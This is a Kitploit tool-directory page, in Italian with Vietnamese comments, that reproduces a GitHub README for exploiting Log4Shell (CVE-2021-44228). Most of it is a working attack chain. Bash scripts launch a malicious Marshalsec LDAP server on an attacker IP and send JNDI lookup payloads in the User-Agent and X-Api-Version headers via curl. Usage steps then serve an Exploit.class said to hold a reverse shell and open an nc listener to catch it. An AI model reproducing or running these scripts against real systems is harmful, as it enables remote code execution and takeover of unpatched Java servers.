Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-44228-Log4Shell- — Test di penetrazione | Kitploit
Strumenti/GitHubGitHub/khaidtraivch/cve-2021-44228-log4shell-
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCommand and ControlStrumento di Accesso Remoto
GitHubkhaidtraivch/cve-2021-44228-log4shell-

CVE-2021-44228-Log4Shell-

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Test di penetrazione

Vedi Repository
111 anno faNon ancora revisionato
Condividi

CVE-2021-44228-Log4Shell-

Test di penetrazione

  1. Creare un server LDAP dannoso (usando Marshalsec) #!/bin/bash

Script: start_ldap_server.sh

Yêu cầu: Cài đặt Java và Marshalsec (https://github.com/mbechler/marshalsec)

LDAP_PORT="1389" HTTP_PORT="8000" ATTACKER_IP="192.168.0.101" REVERSE_PORT="5555"

echo "[+] Khởi động LDAP server độc hại trên port $LDAP_PORT..." java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
"http://$ATTACKER_IP:$HTTP_PORT/#Exploit" $LDAP_PORT

  1. Inviare il payload Log4Shell dal webserver compromesso

#!/bin/bash

Script: exploit_log4shell.sh

Mục tiêu: Gửi payload JNDI đến máy trạm Windows

TARGET_IP="192.168.1.10" ATTACKER_IP="192.168.0.101" LDAP_PORT="1389"

echo "[+] Gửi payload Log4Shell đến $TARGET_IP..." curl -X GET
"http://$TARGET_IP"
-H "User-Agent: ${jndi:ldap://$ATTACKER_IP:$LDAP_PORT/Exploit}"
-H "X-Api-Version: ${jndi:ldap://$ATTACKER_IP:$LDAP_PORT/Exploit}"

Utilizzo

Avviare il server LDAP:

./start_ldap_server.sh

Eseguire il server HTTP per ospitare il file Exploit.class (contenente reverse shell):

python3 -m http.server 8000

Inviare il payload dal webserver compromesso

./exploit_log4shell.sh

Ascoltare per la reverse shell sulla macchina attaccante:

nc -lvnp 5555

Scarica lo strumento